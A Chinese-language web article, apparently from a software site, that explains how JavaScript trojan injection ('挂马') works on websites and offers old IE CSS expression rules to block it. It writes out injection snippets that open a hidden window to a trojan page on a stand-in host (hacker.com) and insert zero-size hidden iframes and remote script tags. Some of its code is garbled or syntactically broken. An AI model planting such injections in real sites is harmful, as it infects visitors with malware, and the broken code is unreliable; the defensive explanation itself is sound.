网站(Website)是指在因特网上根据一定的规则,使用HTML(标准通用标记语言下的一个应用)等工具制作的用于展示特定内容相关网页的集合。简单地说,网站是一种沟通工具,人们可以通过网站来发布自己想要公开的资讯,或者利用网站来提供相关的网络服务。人们可以通过网页浏览器来访问网站,获取自己需要的资讯或者享受网络服务。
现在最多见的JS挂马方法有两种一种是直接将JavaScript脚本代码写在网页中当访问者在浏览网页时恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口隐藏地运行
这种方法使用的关键代码如下
window.open"http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1";
这种代码往往很长很容易被安全工程师发现而且没有经验的黑客也喜欢将width和height=参数设为0但是设置为0后可能会出现恶意代码不运行的情况
另外一种JS挂马方式是黑客先将挂马脚本代码document.write'<Iframe src="http://soft.zol.com.cn/225/网页木马地址" ></iframe>'写入Windows中的写字板另存为后缀为.js的脚本文件并上传到自己指定的网址这时黑客只需要在受害者的网站中写入
<script src="http://www.hacker.com/木马脚本.js"></script>
或者
document.write"<div>"
document.write"<iframe src="http://soft.zol.com.cn/225/网页木马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>"
document.write"</div>"
就成功地将木马挂到了对方的网页中了
小提示黑客还可以根据情况随机变换插入的JS挂马方法例如黑客有可能会将脚本写为
<div>
或者
<iframe src="[挂马脚本][挂马脚本]">
防第一种JS挂马方式不方便用得非常少而第二种JS挂马方式才是当前主流的所以我们主要针对它进行防御方法就是阻止Src请求的异地外域的JS脚本代码如下
iframe{mdy1:expressionthis.src='about:blank',this.outerHTML='';}
script{mzm2:expressionthis.src.toLowerCase.indexOf'http'==0}
不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页
所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码这段代码会让异地外域的JS文件在使用document.write时被document.close强制关闭这个时侯JS挂马的内容往往还没有来得及写完只有部分被强制输出了Writer后面的内容再不会被写入访问者的电脑中从而起到防范JS脚本挂马的作用
让JS木马的进程迅速中止
在 <head> </head> 之间加入如下代码:
屏蔽script和iframe
<style type="text/css">
/*<![CDATA[*/
iframe{nhk1:expressionthis.src='about:blank',this.outerHTML='';}
script{ngz1:expressionthis.src.indexOf'http'==0
/*]]>*/
</style>
单屏蔽script
<style type="text/css">
/*<![CDATA[*/
/*iframe{nhk1:expressionthis.src='about:blank',this.outerHTML='';}*/
script{ngz1:expressionthis.src.indexOf'http'==0}
/*]]>*/
</style>
'http://xiazai.zol.com.cn/ie9/';" src="/cache/201507/23/231035ySTwoa.jpg" />
尽享网络之美 微软IE9正式发布
| ie9中文版官方下载 | IE9正式版32位win7 | IE9使用技巧大全 |
| IE9正式版64位win7 | IE9正式版32位Vista | IE9正式版64位Vista |